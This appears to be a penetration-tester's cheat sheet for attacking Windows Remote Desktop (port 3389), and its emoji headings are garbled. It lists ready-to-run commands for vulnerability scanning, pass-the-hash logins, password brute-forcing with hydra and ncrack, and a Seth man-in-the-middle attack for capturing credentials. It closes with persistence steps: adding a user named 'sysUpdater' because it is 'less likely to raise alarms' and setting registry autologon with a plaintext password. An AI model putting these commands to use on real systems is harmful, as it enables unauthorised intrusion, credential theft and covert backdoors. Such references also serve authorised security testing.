Appearance
π₯οΈ RDP - 3389 β
π Resources β
Tools β
ποΈ Recon β
bash
# rdp-vuln-ms12-020 (BlueKeep - CVE-2019-0708)
nmap -p 3389 --script=rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 $target
rdpscan -t $IPbash
# Check if NLA is enabled (important for MITM feasibility)
nmap --script=rdp-enum-encryption -p 3389 $IP | grep 'Security layer'
# "Security layer: CredSSP (NLA)" -> NLA is enabled -> MITM (Seth) not possible
# "Security layer: RDP or SSL" -> NLA disabled -> vulnerable to Seth / MITMπ€ Connection β
bash
# test credentials
crackmapexec rdp $IP -u administrator -p passwordbash
# https://www.kali.org/tools/freerdp3/ - all packages available
# sudo apt install xfreerdp3-x11
xfreerdp /v:$IP /u:username /p:'' # username with blank pass
# Pass The Hash
xfreerdp /v:$IP /u:username /pth:<hash>
# Ignore certificat
xfreerdp /v:$IP /u:username /p:pass /cert:ignore
# NLA security level
xfreerdp /v:$IP /u:username /p:password /sec:nla
# Force security level (e.g., disable NLA)
xfreerdp /v:$IP /u:username /p:password /sec:rdpbash
rdesktop -u username $IP
rdesktop -d Domain -u username -p password $IPbash
# Windows (native)
mstsc /v:$IP
# Admin mode
mstsc /v:target.com /adminβοΈβπ₯ Brute-Force β
β οΈ Brute-force can trigger account lockout or detection alerts.
bash
ncrack -p 3389 -u administrator -P rockyou.txt $IPbash
hydra -l administrator -P rockyou.txt $IP rdpbash
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS target.com
runπ§ͺ MITM β
With the tool Seth (github), you can perform a MITM attack on RDP by generating fake certificates.
β οΈ Note please: This attack only works if NLA (Network Level Authentication) is disabled on the target. Most modern systems have it enabled by default.
bash
seth -i <interface> -t <target_ip> [<target_ip_x>] --rdpIf a user connects to the targeted machine during the attack, their credentials may be captured by the attacker.
Note β
Seth performs a Man-in-the-Middle attack against RDP by spoofing certificates and relaying connections. Requires: LLMNR/NBTNS poisoning or ARP spoofing setup (e.g. using Responder or bettercap).
πͺ Persistence via RDP β
- Enable RDP remotely (if you have admin shell)
ps1
# Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
# Allow through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"- Add new RDP user
bash
# sysUpdater (less likely to raise alarms)
net user sysUpdater Passw0rd! /add
net localgroup "Remote Desktop Users" sysUpdater /add- RDP backdoor via registry (for autologon)
bash
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d sysUpdater /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d Passw0rd! /f